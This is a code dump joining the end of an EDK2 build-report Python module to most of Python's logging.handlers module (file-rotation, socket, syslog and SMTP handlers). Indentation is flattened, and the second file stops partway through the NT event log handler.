self.PcdReport.GenerateReport(File, None)
if "FLASH" in ReportType:
for FdReportListItem in self.FdReportList:
FdReportListItem.GenerateReport(File)
for ModuleReportItem in self.ModuleReportList:
ModuleReportItem.GenerateReport(File, self.PcdReport, self.PredictionReport, self.DepexParser, ReportType)
if not self._IsModuleBuild:
if "EXECUTION_ORDER" in ReportType:
self.PredictionReport.GenerateReport(File, None)
## BuildReport class
#
# This base class contain the routines to collect data and then
# applies certain format to the output report
#
class BuildReport(object):
##
# Constructor function for class BuildReport
#
# This constructor function generates BuildReport object a platform build.
# It generates report for platform summary, flash, global PCDs and detailed
# module information for modules involved in platform build.
#
# @param self The object pointer
# @param ReportFile The file name to save report file
# @param ReportType The kind of report items in the final report file
#
def __init__(self, ReportFile, ReportType):
self.ReportFile = ReportFile
if ReportFile:
self.ReportList = []
self.ReportType = []
if ReportType:
for ReportTypeItem in ReportType:
if ReportTypeItem not in self.ReportType:
self.ReportType.append(ReportTypeItem)
else:
self.ReportType = ["PCD", "LIBRARY", "BUILD_FLAGS", "DEPEX", "HASH", "FLASH", "FIXED_ADDRESS"]
##
# Adds platform report to the list
#
# This function adds a platform report to the final report list.
#
# @param self The object pointer
# @param Wa Workspace context information
# @param MaList The list of modules in the platform build
#
def AddPlatformReport(self, Wa, MaList=None):
if self.ReportFile:
self.ReportList.append((Wa, MaList))
##
# Generates the final report.
#
# This function generates platform build report. It invokes GenerateReport()
# method for every platform report in the list.
#
# @param self The object pointer
# @param BuildDuration The total time to build the modules
# @param AutoGenTime The total time of AutoGen phase
# @param MakeTime The total time of Make phase
# @param GenFdsTime The total time of GenFds phase
#
def GenerateReport(self, BuildDuration, AutoGenTime, MakeTime, GenFdsTime):
if self.ReportFile:
try:
File = []
for (Wa, MaList) in self.ReportList:
PlatformReport(Wa, MaList, self.ReportType).GenerateReport(File, BuildDuration, AutoGenTime, MakeTime, GenFdsTime, self.ReportType)
Content = FileLinesSplit(''.join(File), gLineMaxLength)
SaveFileOnChange(self.ReportFile, Content, False)
EdkLogger.quiet("Build report can be found at %s" % os.path.abspath(self.ReportFile))
except IOError:
EdkLogger.error(None, FILE_WRITE_FAILURE, ExtraData=self.ReportFile)
except:
EdkLogger.error("BuildReport", CODE_ERROR, "Unknown fatal error when generating build report", ExtraData=self.ReportFile, RaiseError=False)
EdkLogger.quiet("(Python %s on %s\n%s)" % (platform.python_version(), sys.platform, traceback.format_exc()))
# This acts like the main() function for the script, unless it is 'import'ed into another script.
if __name__ == '__main__':
pass
|
handlers.py
|
# Copyright 2001-2016 by Vinay Sajip. All Rights Reserved.
#
# Permission to use, copy, modify, and distribute this software and its
# documentation for any purpose and without fee is hereby granted,
# provided that the above copyright notice appear in all copies and that
# both that copyright notice and this permission notice appear in
# supporting documentation, and that the name of Vinay Sajip
# not be used in advertising or publicity pertaining to distribution
# of the software without specific, written prior permission.
# VINAY SAJIP DISCLAIMS ALL WARRANTIES WITH REGARD TO THIS SOFTWARE, INCLUDING
# ALL IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL
# VINAY SAJIP BE LIABLE FOR ANY SPECIAL, INDIRECT OR CONSEQUENTIAL DAMAGES OR
# ANY DAMAGES WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER
# IN AN ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT
# OF OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE.
"""
Additional handlers for the logging package for Python. The core package is
based on PEP 282 and comments thereto in comp.lang.python.
Copyright (C) 2001-2016 Vinay Sajip. All Rights Reserved.
To use, simply 'import logging.handlers' and log away!
"""
import logging, socket, os, pickle, struct, time, re
from stat import ST_DEV, ST_INO, ST_MTIME
import queue
import threading
#
# Some constants...
#
DEFAULT_TCP_LOGGING_PORT = 9020
DEFAULT_UDP_LOGGING_PORT = 9021
DEFAULT_HTTP_LOGGING_PORT = 9022
DEFAULT_SOAP_LOGGING_PORT = 9023
SYSLOG_UDP_PORT = 514
SYSLOG_TCP_PORT = 514
_MIDNIGHT = 24 * 60 * 60 # number of seconds in a day
class BaseRotatingHandler(logging.FileHandler):
"""
Base class for handlers that rotate log files at a certain point.
Not meant to be instantiated directly. Instead, use RotatingFileHandler
or TimedRotatingFileHandler.
"""
def __init__(self, filename, mode, encoding=None, delay=False):
"""
Use the specified filename for streamed logging
"""
logging.FileHandler.__init__(self, filename, mode, encoding, delay)
self.mode = mode
self.encoding = encoding
self.namer = None
self.rotator = None
def emit(self, record):
"""
Emit a record.
Output the record to the file, catering for rollover as described
in doRollover().
"""
try:
if self.shouldRollover(record):
self.doRollover()
logging.FileHandler.emit(self, record)
except Exception:
self.handleError(record)
def rotation_filename(self, default_name):
"""
Modify the filename of a log file when rotating.
This is provided so that a custom filename can be provided.
The default implementation calls the 'namer' attribute of the
handler, if it's callable, passing the default name to
it. If the attribute isn't callable (the default is None), the name
is returned unchanged.
:param default_name: The default name for the log file.
"""
if not callable(self.namer):
result = default_name
else:
result = self.namer(default_name)
return result
def rotate(self, source, dest):
"""
When rotating, rotate the current log.
The default implementation calls the 'rotator' attribute of the
handler, if it's callable, passing the source and dest arguments to
it. If the attribute isn't callable (the default is None), the source
is simply renamed to the destination.
:param source: The source filename. This is normally the base
filename, e.g. 'test.log'
:param dest: The destination filename. This is normally
what the source is rotated to, e.g. 'test.log.1'.
"""
if not callable(self.rotator):
# Issue 18940: A file may not have been created if delay is True.
if os.path.exists(source):
os.rename(source, dest)
else:
self.rotator(source, dest)
class RotatingFileHandler(BaseRotatingHandler):
"""
Handler for logging to a set of files, which switches from one file
to the next when the current file reaches a certain size.
"""
def __init__(self, filename, mode='a', maxBytes=0, backupCount=0, encoding=None, delay=False):
"""
Open the specified file and use it as the stream for logging.
By default, the file grows indefinitely. You can specify particular
values of maxBytes and backupCount to allow the file to rollover at
a predetermined size.
Rollover occurs whenever the current log file is nearly maxBytes in
length. If backupCount is >= 1, the system will successively create
new files with the same pathname as the base file, but with extensions
".1", ".2" etc. appended to it. For example, with a backupCount of 5
and a base file name of "app.log", you would get "app.log",
"app.log.1", "app.log.2", ... through to "app.log.5". The file being
written to is always "app.log" - when it gets filled up, it is closed
and renamed to "app.log.1", and if files "app.log.1", "app.log.2" etc.
exist, then they are renamed to "app.log.2", "app.log.3" etc.
respectively.
If maxBytes is zero, rollover never occurs.
"""
# If rotation/rollover is wanted, it doesn't make sense to use another
# mode. If for example 'w' were specified, then if there were multiple
# runs of the calling application, the logs from previous runs would be
# lost if the 'w' is respected, because the log file would be truncated
# on each run.
if maxBytes > 0:
mode = 'a'
BaseRotatingHandler.__init__(self, filename, mode, encoding, delay)
self.maxBytes = maxBytes
self.backupCount = backupCount
def doRollover(self):
"""
Do a rollover, as described in __init__().
"""
if self.stream:
self.stream.close()
self.stream = None
if self.backupCount > 0:
for i in range(self.backupCount - 1, 0, -1):
sfn = self.rotation_filename("%s.%d" % (self.baseFilename, i))
dfn = self.rotation_filename("%s.%d" % (self.baseFilename,
i + 1))
if os.path.exists(sfn):
if os.path.exists(dfn):
os.remove(dfn)
os.rename(sfn, dfn)
dfn = self.rotation_filename(self.baseFilename + ".1")
if os.path.exists(dfn):
os.remove(dfn)
self.rotate(self.baseFilename, dfn)
if not self.delay:
self.stream = self._open()
def shouldRollover(self, record):
"""
Determine if rollover should occur.
Basically, see if the supplied record would cause the file to exceed
the size limit we have.
"""
if self.stream is None: # delay was set...
self.stream = self._open()
if self.maxBytes > 0: # are we rolling over?
msg = "%s\n" % self.format(record)
self.stream.seek(0, 2) #due to non-posix-compliant Windows feature
if self.stream.tell() + len(msg) >= self.maxBytes:
return 1
return 0
class TimedRotatingFileHandler(BaseRotatingHandler):
"""
Handler for logging to a file, rotating the log file at certain timed
intervals.
If backupCount is > 0, when rollover is done, no more than backupCount
files are kept - the oldest ones are deleted.
"""
def __init__(self, filename, when='h', interval=1, backupCount=0, encoding=None, delay=False, utc=False, atTime=None):
BaseRotatingHandler.__init__(self, filename, 'a', encoding, delay)
self.when = when.upper()
self.backupCount = backupCount
self.utc = utc
self.atTime = atTime
# Calculate the real rollover interval, which is just the number of
# seconds between rollovers. Also set the filename suffix used when
# a rollover occurs. Current 'when' events supported:
# S - Seconds
# M - Minutes
# H - Hours
# D - Days
# midnight - roll over at midnight
# W{0-6} - roll over on a certain day; 0 - Monday
#
# Case of the 'when' specifier is not important; lower or upper case
# will work.
if self.when == 'S':
self.interval = 1 # one second
self.suffix = "%Y-%m-%d_%H-%M-%S"
self.extMatch = r"^\d{4}-\d{2}-\d{2}_\d{2}-\d{2}-\d{2}(\.\w+)?$"
elif self.when == 'M':
self.interval = 60 # one minute
self.suffix = "%Y-%m-%d_%H-%M"
self.extMatch = r"^\d{4}-\d{2}-\d{2}_\d{2}-\d{2}(\.\w+)?$"
elif self.when == 'H':
self.interval = 60 * 60 # one hour
self.suffix = "%Y-%m-%d_%H"
self.extMatch = r"^\d{4}-\d{2}-\d{2}_\d{2}(\.\w+)?$"
elif self.when == 'D' or self.when == 'MIDNIGHT':
self.interval = 60 * 60 * 24 # one day
self.suffix = "%Y-%m-%d"
self.extMatch = r"^\d{4}-\d{2}-\d{2}(\.\w+)?$"
elif self.when.startswith('W'):
self.interval = 60 * 60 * 24 * 7 # one week
if len(self.when) != 2:
raise ValueError("You must specify a day for weekly rollover from 0 to 6 (0 is Monday): %s" % self.when)
if self.when[1] < '0' or self.when[1] > '6':
raise ValueError("Invalid day specified for weekly rollover: %s" % self.when)
self.dayOfWeek = int(self.when[1])
self.suffix = "%Y-%m-%d"
self.extMatch = r"^\d{4}-\d{2}-\d{2}(\.\w+)?$"
else:
raise ValueError("Invalid rollover interval specified: %s" % self.when)
self.extMatch = re.compile(self.extMatch, re.ASCII)
self.interval = self.interval * interval # multiply by units requested
# The following line added because the filename passed in could be a
# path object (see Issue #27493), but self.baseFilename will be a string
filename = self.baseFilename
if os.path.exists(filename):
t = os.stat(filename)[ST_MTIME]
else:
t = int(time.time())
self.rolloverAt = self.computeRollover(t)
def computeRollover(self, currentTime):
"""
Work out the rollover time based on the specified time.
"""
result = currentTime + self.interval
# If we are rolling over at midnight or weekly, then the interval is already known.
# What we need to figure out is WHEN the next interval is. In other words,
# if you are rolling over at midnight, then your base interval is 1 day,
# but you want to start that one day clock at midnight, not now. So, we
# have to fudge the rolloverAt value in order to trigger the first rollover
# at the right time. After that, the regular interval will take care of
# the rest. Note that this code doesn't care about leap seconds. :)
if self.when == 'MIDNIGHT' or self.when.startswith('W'):
# This could be done with less code, but I wanted it to be clear
if self.utc:
t = time.gmtime(currentTime)
else:
t = time.localtime(currentTime)
currentHour = t[3]
currentMinute = t[4]
currentSecond = t[5]
currentDay = t[6]
# r is the number of seconds left between now and the next rotation
if self.atTime is None:
rotate_ts = _MIDNIGHT
else:
rotate_ts = ((self.atTime.hour * 60 + self.atTime.minute)*60 +
self.atTime.second)
r = rotate_ts - ((currentHour * 60 + currentMinute) * 60 +
currentSecond)
if r < 0:
# Rotate time is before the current time (for example when
# self.rotateAt is 13:45 and it now 14:15), rotation is
# tomorrow.
r += _MIDNIGHT
currentDay = (currentDay + 1) % 7
result = currentTime + r
# If we are rolling over on a certain day, add in the number of days until
# the next rollover, but offset by 1 since we just calculated the time
# until the next day starts. There are three cases:
# Case 1) The day to rollover is today; in this case, do nothing
# Case 2) The day to rollover is further in the interval (i.e., today is
# day 2 (Wednesday) and rollover is on day 6 (Sunday). Days to
# next rollover is simply 6 - 2 - 1, or 3.
# Case 3) The day to rollover is behind us in the interval (i.e., today
# is day 5 (Saturday) and rollover is on day 3 (Thursday).
# Days to rollover is 6 - 5 + 3, or 4. In this case, it's the
# number of days left in the current week (1) plus the number
# of days in the next week until the rollover day (3).
# The calculations described in 2) and 3) above need to have a day added.
# This is because the above time calculation takes us to midnight on this
# day, i.e. the start of the next day.
if self.when.startswith('W'):
day = currentDay # 0 is Monday
if day != self.dayOfWeek:
if day < self.dayOfWeek:
daysToWait = self.dayOfWeek - day
else:
daysToWait = 6 - day + self.dayOfWeek + 1
newRolloverAt = result + (daysToWait * (60 * 60 * 24))
if not self.utc:
dstNow = t[-1]
dstAtRollover = time.localtime(newRolloverAt)[-1]
if dstNow != dstAtRollover:
if not dstNow: # DST kicks in before next rollover, so we need to deduct an hour
addend = -3600
else: # DST bows out before next rollover, so we need to add an hour
addend = 3600
newRolloverAt += addend
result = newRolloverAt
return result
def shouldRollover(self, record):
"""
Determine if rollover should occur.
record is not used, as we are just comparing times, but it is needed so
the method signatures are the same
"""
t = int(time.time())
if t >= self.rolloverAt:
return 1
return 0
def getFilesToDelete(self):
"""
Determine the files to delete when rolling over.
More specific than the earlier method, which just used glob.glob().
"""
dirName, baseName = os.path.split(self.baseFilename)
fileNames = os.listdir(dirName)
result = []
prefix = baseName + "."
plen = len(prefix)
for fileName in fileNames:
if fileName[:plen] == prefix:
suffix = fileName[plen:]
if self.extMatch.match(suffix):
result.append(os.path.join(dirName, fileName))
if len(result) < self.backupCount:
result = []
else:
result.sort()
result = result[:len(result) - self.backupCount]
return result
def doRollover(self):
"""
do a rollover; in this case, a date/time stamp is appended to the filename
when the rollover happens. However, you want the file to be named for the
start of the interval, not the current time. If there is a backup count,
then we have to get a list of matching filenames, sort them and remove
the one with the oldest suffix.
"""
if self.stream:
self.stream.close()
self.stream = None
# get the time that this sequence started at and make it a TimeTuple
currentTime = int(time.time())
dstNow = time.localtime(currentTime)[-1]
t = self.rolloverAt - self.interval
if self.utc:
timeTuple = time.gmtime(t)
else:
timeTuple = time.localtime(t)
dstThen = timeTuple[-1]
if dstNow != dstThen:
if dstNow:
addend = 3600
else:
addend = -3600
timeTuple = time.localtime(t + addend)
dfn = self.rotation_filename(self.baseFilename + "." +
time.strftime(self.suffix, timeTuple))
if os.path.exists(dfn):
os.remove(dfn)
self.rotate(self.baseFilename, dfn)
if self.backupCount > 0:
for s in self.getFilesToDelete():
os.remove(s)
if not self.delay:
self.stream = self._open()
newRolloverAt = self.computeRollover(currentTime)
while newRolloverAt <= currentTime:
newRolloverAt = newRolloverAt + self.interval
#If DST changes and midnight or weekly rollover, adjust for this.
if (self.when == 'MIDNIGHT' or self.when.startswith('W')) and not self.utc:
dstAtRollover = time.localtime(newRolloverAt)[-1]
if dstNow != dstAtRollover:
if not dstNow: # DST kicks in before next rollover, so we need to deduct an hour
addend = -3600
else: # DST bows out before next rollover, so we need to add an hour
addend = 3600
newRolloverAt += addend
self.rolloverAt = newRolloverAt
class WatchedFileHandler(logging.FileHandler):
"""
A handler for logging to a file, which watches the file
to see if it has changed while in use. This can happen because of
usage of programs such as newsyslog and logrotate which perform
log file rotation. This handler, intended for use under Unix,
watches the file to see if it has changed since the last emit.
(A file has changed if its device or inode have changed.)
If it has changed, the old file stream is closed, and the file
opened to get a new stream.
This handler is not appropriate for use under Windows, because
under Windows open files cannot be moved or renamed - logging
opens the files with exclusive locks - and so there is no need
for such a handler. Furthermore, ST_INO is not supported under
Windows; stat always returns zero for this value.
This handler is based on a suggestion and patch by Chad J.
Schroeder.
"""
def __init__(self, filename, mode='a', encoding=None, delay=False):
logging.FileHandler.__init__(self, filename, mode, encoding, delay)
self.dev, self.ino = -1, -1
self._statstream()
def _statstream(self):
if self.stream:
sres = os.fstat(self.stream.fileno())
self.dev, self.ino = sres[ST_DEV], sres[ST_INO]
def reopenIfNeeded(self):
"""
Reopen log file if needed.
Checks if the underlying file has changed, and if it
has, close the old stream and reopen the file to get the
current stream.
"""
# Reduce the chance of race conditions by stat'ing by path only
# once and then fstat'ing our new fd if we opened a new log stream.
# See issue #14632: Thanks to John Mulligan for the problem report
# and patch.
try:
# stat the file by path, checking for existence
sres = os.stat(self.baseFilename)
except FileNotFoundError:
sres = None
# compare file system stat with that of our stream file handle
if not sres or sres[ST_DEV] != self.dev or sres[ST_INO] != self.ino:
if self.stream is not None:
# we have an open file handle, clean it up
self.stream.flush()
self.stream.close()
self.stream = None # See Issue #21742: _open () might fail.
# open a new file handle and get new stat info from that fd
self.stream = self._open()
self._statstream()
def emit(self, record):
"""
Emit a record.
If underlying file has changed, reopen the file before emitting the
record to it.
"""
self.reopenIfNeeded()
logging.FileHandler.emit(self, record)
class SocketHandler(logging.Handler):
"""
A handler class which writes logging records, in pickle format, to
a streaming socket. The socket is kept open across logging calls.
If the peer resets it, an attempt is made to reconnect on the next call.
The pickle which is sent is that of the LogRecord's attribute dictionary
(__dict__), so that the receiver does not need to have the logging module
installed in order to process the logging event.
To unpickle the record at the receiving end into a LogRecord, use the
makeLogRecord function.
"""
def __init__(self, host, port):
"""
Initializes the handler with a specific host address and port.
When the attribute *closeOnError* is set to True - if a socket error
occurs, the socket is silently closed and then reopened on the next
logging call.
"""
logging.Handler.__init__(self)
self.host = host
self.port = port
if port is None:
self.address = host
else:
self.address = (host, port)
self.sock = None
self.closeOnError = False
self.retryTime = None
#
# Exponential backoff parameters.
#
self.retryStart = 1.0
self.retryMax = 30.0
self.retryFactor = 2.0
def makeSocket(self, timeout=1):
"""
A factory method which allows subclasses to define the precise
type of socket they want.
"""
if self.port is not None:
result = socket.create_connection(self.address, timeout=timeout)
else:
result = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
result.settimeout(timeout)
try:
result.connect(self.address)
except OSError:
result.close() # Issue 19182
raise
return result
def createSocket(self):
"""
Try to create a socket, using an exponential backoff with
a max retry time. Thanks to Robert Olson for the original patch
(SF #815911) which has been slightly refactored.
"""
now = time.time()
# Either retryTime is None, in which case this
# is the first time back after a disconnect, or
# we've waited long enough.
if self.retryTime is None:
attempt = True
else:
attempt = (now >= self.retryTime)
if attempt:
try:
self.sock = self.makeSocket()
self.retryTime = None # next time, no delay before trying
except OSError:
#Creation failed, so set the retry time and return.
if self.retryTime is None:
self.retryPeriod = self.retryStart
else:
self.retryPeriod = self.retryPeriod * self.retryFactor
if self.retryPeriod > self.retryMax:
self.retryPeriod = self.retryMax
self.retryTime = now + self.retryPeriod
def send(self, s):
"""
Send a pickled string to the socket.
This function allows for partial sends which can happen when the
network is busy.
"""
if self.sock is None:
self.createSocket()
#self.sock can be None either because we haven't reached the retry
#time yet, or because we have reached the retry time and retried,
#but are still unable to connect.
if self.sock:
try:
self.sock.sendall(s)
except OSError: #pragma: no cover
self.sock.close()
self.sock = None # so we can call createSocket next time
def makePickle(self, record):
"""
Pickles the record in binary format with a length prefix, and
returns it ready for transmission across the socket.
"""
ei = record.exc_info
if ei:
# just to get traceback text into record.exc_text ...
dummy = self.format(record)
# See issue #14436: If msg or args are objects, they may not be
# available on the receiving end. So we convert the msg % args
# to a string, save it as msg and zap the args.
d = dict(record.__dict__)
d['msg'] = record.getMessage()
d['args'] = None
d['exc_info'] = None
# Issue #25685: delete 'message' if present: redundant with 'msg'
d.pop('message', None)
s = pickle.dumps(d, 1)
slen = struct.pack(">L", len(s))
return slen + s
def handleError(self, record):
"""
Handle an error during logging.
An error has occurred during logging. Most likely cause -
connection lost. Close the socket so that we can retry on the
next event.
"""
if self.closeOnError and self.sock:
self.sock.close()
self.sock = None #try to reconnect next time
else:
logging.Handler.handleError(self, record)
def emit(self, record):
"""
Emit a record.
Pickles the record and writes it to the socket in binary format.
If there is an error with the socket, silently drop the packet.
If there was a problem with the socket, re-establishes the
socket.
"""
try:
s = self.makePickle(record)
self.send(s)
except Exception:
self.handleError(record)
def close(self):
"""
Closes the socket.
"""
self.acquire()
try:
sock = self.sock
if sock:
self.sock = None
sock.close()
logging.Handler.close(self)
finally:
self.release()
class DatagramHandler(SocketHandler):
"""
A handler class which writes logging records, in pickle format, to
a datagram socket. The pickle which is sent is that of the LogRecord's
attribute dictionary (__dict__), so that the receiver does not need to
have the logging module installed in order to process the logging event.
To unpickle the record at the receiving end into a LogRecord, use the
makeLogRecord function.
"""
def __init__(self, host, port):
"""
Initializes the handler with a specific host address and port.
"""
SocketHandler.__init__(self, host, port)
self.closeOnError = False
def makeSocket(self):
"""
The factory method of SocketHandler is here overridden to create
a UDP socket (SOCK_DGRAM).
"""
if self.port is None:
family = socket.AF_UNIX
else:
family = socket.AF_INET
s = socket.socket(family, socket.SOCK_DGRAM)
return s
def send(self, s):
"""
Send a pickled string to a socket.
This function no longer allows for partial sends which can happen
when the network is busy - UDP does not guarantee delivery and
can deliver packets out of sequence.
"""
if self.sock is None:
self.createSocket()
self.sock.sendto(s, self.address)
class SysLogHandler(logging.Handler):
"""
A handler class which sends formatted logging records to a syslog
server. Based on Sam Rushing's syslog module:
http://www.nightmare.com/squirl/python-ext/misc/syslog.py
Contributed by Nicolas Untz (after which minor refactoring changes
have been made).
"""
# from <linux/sys/syslog.h>:
# ======================================================================
# priorities/facilities are encoded into a single 32-bit quantity, where
# the bottom 3 bits are the priority (0-7) and the top 28 bits are the
# facility (0-big number). Both the priorities and the facilities map
# roughly one-to-one to strings in the syslogd(8) source code. This
# mapping is included in this file.
#
# priorities (these are ordered)
LOG_EMERG = 0 # system is unusable
LOG_ALERT = 1 # action must be taken immediately
LOG_CRIT = 2 # critical conditions
LOG_ERR = 3 # error conditions
LOG_WARNING = 4 # warning conditions
LOG_NOTICE = 5 # normal but significant condition
LOG_INFO = 6 # informational
LOG_DEBUG = 7 # debug-level messages
# facility codes
LOG_KERN = 0 # kernel messages
LOG_USER = 1 # random user-level messages
LOG_MAIL = 2 # mail system
LOG_DAEMON = 3 # system daemons
LOG_AUTH = 4 # security/authorization messages
LOG_SYSLOG = 5 # messages generated internally by syslogd
LOG_LPR = 6 # line printer subsystem
LOG_NEWS = 7 # network news subsystem
LOG_UUCP = 8 # UUCP subsystem
LOG_CRON = 9 # clock daemon
LOG_AUTHPRIV = 10 # security/authorization messages (private)
LOG_FTP = 11 # FTP daemon
# other codes through 15 reserved for system use
LOG_LOCAL0 = 16 # reserved for local use
LOG_LOCAL1 = 17 # reserved for local use
LOG_LOCAL2 = 18 # reserved for local use
LOG_LOCAL3 = 19 # reserved for local use
LOG_LOCAL4 = 20 # reserved for local use
LOG_LOCAL5 = 21 # reserved for local use
LOG_LOCAL6 = 22 # reserved for local use
LOG_LOCAL7 = 23 # reserved for local use
priority_names = {
"alert": LOG_ALERT,
"crit": LOG_CRIT,
"critical": LOG_CRIT,
"debug": LOG_DEBUG,
"emerg": LOG_EMERG,
"err": LOG_ERR,
"error": LOG_ERR, # DEPRECATED
"info": LOG_INFO,
"notice": LOG_NOTICE,
"panic": LOG_EMERG, # DEPRECATED
"warn": LOG_WARNING, # DEPRECATED
"warning": LOG_WARNING,
}
facility_names = {
"auth": LOG_AUTH,
"authpriv": LOG_AUTHPRIV,
"cron": LOG_CRON,
"daemon": LOG_DAEMON,
"ftp": LOG_FTP,
"kern": LOG_KERN,
"lpr": LOG_LPR,
"mail": LOG_MAIL,
"news": LOG_NEWS,
"security": LOG_AUTH, # DEPRECATED
"syslog": LOG_SYSLOG,
"user": LOG_USER,
"uucp": LOG_UUCP,
"local0": LOG_LOCAL0,
"local1": LOG_LOCAL1,
"local2": LOG_LOCAL2,
"local3": LOG_LOCAL3,
"local4": LOG_LOCAL4,
"local5": LOG_LOCAL5,
"local6": LOG_LOCAL6,
"local7": LOG_LOCAL7,
}
#The map below appears to be trivially lowercasing the key. However,
#there's more to it than meets the eye - in some locales, lowercasing
#gives unexpected results. See SF #1524081: in the Turkish locale,
#"INFO".lower() != "info"
priority_map = {
"DEBUG" : "debug",
"INFO" : "info",
"WARNING" : "warning",
"ERROR" : "error",
"CRITICAL" : "critical"
}
def __init__(self, address=('localhost', SYSLOG_UDP_PORT),
facility=LOG_USER, socktype=None):
"""
Initialize a handler.
If address is specified as a string, a UNIX socket is used. To log to a
local syslogd, "SysLogHandler(address="/dev/log")" can be used.
If facility is not specified, LOG_USER is used. If socktype is
specified as socket.SOCK_DGRAM or socket.SOCK_STREAM, that specific
socket type will be used. For Unix sockets, you can also specify a
socktype of None, in which case socket.SOCK_DGRAM will be used, falling
back to socket.SOCK_STREAM.
"""
logging.Handler.__init__(self)
self.address = address
self.facility = facility
self.socktype = socktype
if isinstance(address, str):
self.unixsocket = True
# Syslog server may be unavailable during handler initialisation.
# C's openlog() function also ignores connection errors.
# Moreover, we ignore these errors while logging, so it not worse
# to ignore it also here.
try:
self._connect_unixsocket(address)
except OSError:
pass
else:
self.unixsocket = False
if socktype is None:
socktype = socket.SOCK_DGRAM
host, port = address
ress = socket.getaddrinfo(host, port, 0, socktype)
if not ress:
raise OSError("getaddrinfo returns an empty list")
for res in ress:
af, socktype, proto, _, sa = res
err = sock = None
try:
sock = socket.socket(af, socktype, proto)
if socktype == socket.SOCK_STREAM:
sock.connect(sa)
break
except OSError as exc:
err = exc
if sock is not None:
sock.close()
if err is not None:
raise err
self.socket = sock
self.socktype = socktype
def _connect_unixsocket(self, address):
use_socktype = self.socktype
if use_socktype is None:
use_socktype = socket.SOCK_DGRAM
self.socket = socket.socket(socket.AF_UNIX, use_socktype)
try:
self.socket.connect(address)
# it worked, so set self.socktype to the used type
self.socktype = use_socktype
except OSError:
self.socket.close()
if self.socktype is not None:
# user didn't specify falling back, so fail
raise
use_socktype = socket.SOCK_STREAM
self.socket = socket.socket(socket.AF_UNIX, use_socktype)
try:
self.socket.connect(address)
# it worked, so set self.socktype to the used type
self.socktype = use_socktype
except OSError:
self.socket.close()
raise
def encodePriority(self, facility, priority):
"""
Encode the facility and priority. You can pass in strings or
integers - if strings are passed, the facility_names and
priority_names mapping dictionaries are used to convert them to
integers.
"""
if isinstance(facility, str):
facility = self.facility_names[facility]
if isinstance(priority, str):
priority = self.priority_names[priority]
return (facility << 3) | priority
def close(self):
"""
Closes the socket.
"""
self.acquire()
try:
self.socket.close()
logging.Handler.close(self)
finally:
self.release()
def mapPriority(self, levelName):
"""
Map a logging level name to a key in the priority_names map.
This is useful in two scenarios: when custom levels are being
used, and in the case where you can't do a straightforward
mapping by lowercasing the logging level name because of locale-
specific issues (see SF #1524081).
"""
return self.priority_map.get(levelName, "warning")
ident = '' # prepended to all messages
append_nul = True # some old syslog daemons expect a NUL terminator
def emit(self, record):
"""
Emit a record.
The record is formatted, and then sent to the syslog server. If
exception information is present, it is NOT sent to the server.
"""
try:
msg = self.format(record)
if self.ident:
msg = self.ident + msg
if self.append_nul:
msg += '\000'
# We need to convert record level to lowercase, maybe this will
# change in the future.
prio = '<%d>' % self.encodePriority(self.facility,
self.mapPriority(record.levelname))
prio = prio.encode('utf-8')
# Message is a string. Convert to bytes as required by RFC 5424
msg = msg.encode('utf-8')
msg = prio + msg
if self.unixsocket:
try:
self.socket.send(msg)
except OSError:
self.socket.close()
self._connect_unixsocket(self.address)
self.socket.send(msg)
elif self.socktype == socket.SOCK_DGRAM:
self.socket.sendto(msg, self.address)
else:
self.socket.sendall(msg)
except Exception:
self.handleError(record)
class SMTPHandler(logging.Handler):
"""
A handler class which sends an SMTP email for each logging event.
"""
def __init__(self, mailhost, fromaddr, toaddrs, subject,
credentials=None, secure=None, timeout=5.0):
"""
Initialize the handler.
Initialize the instance with the from and to addresses and subject
line of the email. To specify a non-standard SMTP port, use the
(host, port) tuple format for the mailhost argument. To specify
authentication credentials, supply a (username, password) tuple
for the credentials argument. To specify the use of a secure
protocol (TLS), pass in a tuple for the secure argument. This will
only be used when authentication credentials are supplied. The tuple
will be either an empty tuple, or a single-value tuple with the name
of a keyfile, or a 2-value tuple with the names of the keyfile and
certificate file. (This tuple is passed to the `starttls` method).
A timeout in seconds can be specified for the SMTP connection (the
default is one second).
"""
logging.Handler.__init__(self)
if isinstance(mailhost, (list, tuple)):
self.mailhost, self.mailport = mailhost
else:
self.mailhost, self.mailport = mailhost, None
if isinstance(credentials, (list, tuple)):
self.username, self.password = credentials
else:
self.username = None
self.fromaddr = fromaddr
if isinstance(toaddrs, str):
toaddrs = [toaddrs]
self.toaddrs = toaddrs
self.subject = subject
self.secure = secure
self.timeout = timeout
def getSubject(self, record):
"""
Determine the subject for the email.
If you want to specify a subject line which is record-dependent,
override this method.
"""
return self.subject
def emit(self, record):
"""
Emit a record.
Format the record and send it to the specified addressees.
"""
try:
import smtplib
from email.message import EmailMessage
import email.utils
port = self.mailport
if not port:
port = smtplib.SMTP_PORT
smtp = smtplib.SMTP(self.mailhost, port, timeout=self.timeout)
msg = EmailMessage()
msg['From'] = self.fromaddr
msg['To'] = ','.join(self.toaddrs)
msg['Subject'] = self.getSubject(record)
msg['Date'] = email.utils.localtime()
msg.set_content(self.format(record))
if self.username:
if self.secure is not None:
smtp.ehlo()
smtp.starttls(*self.secure)
smtp.ehlo()
smtp.login(self.username, self.password)
smtp.send_message(msg)
smtp.quit()
except Exception:
self.handleError(record)
class NTEventLogHandler(logging.Handler):
"""
A handler class which sends events to the NT Event Log. Adds a
registry entry for the specified application name. If no dllname is
provided, win32service.pyd (which contains some basic message
placeholders) is used. Note that use of these placeholders will make
your event logs big, as the entire message source is held in the log.
If you want slimmer logs, you have to pass in the name of your own DLL
which contains the message definitions you want to use in the event log.
"""
def __init__(self, appname, dllname=None, logtype="Application"):
logging.Handler.__init__(self)
try:
import win32evtlogutil, win32evtlog
self.appname = appname
self._welu = win32evtlogutil
if not dllname:
dllname = os.path.split(self._welu.__file__)
dllname = os.path.split(dllname[0])
dllname = os.path.join(dllname[0], r'win32service.pyd')
self.dllname = dllname
self.logtype = logtype
self._welu.AddSourceToRegistry(appname, dllname, logtype)
self.deftype = win32evtlog.EVENTLOG_ERROR_TYPE
self.typemap = {
logging.DEBUG : win32evtlog.EVENTLOG_INFORMATION_TYPE,
logging.INFO : win32evtlog.EVENTLOG_INFORMATION_TYPE,
logging.WARNING : win32evtlog.EVENTLOG_WARNING_TYPE,
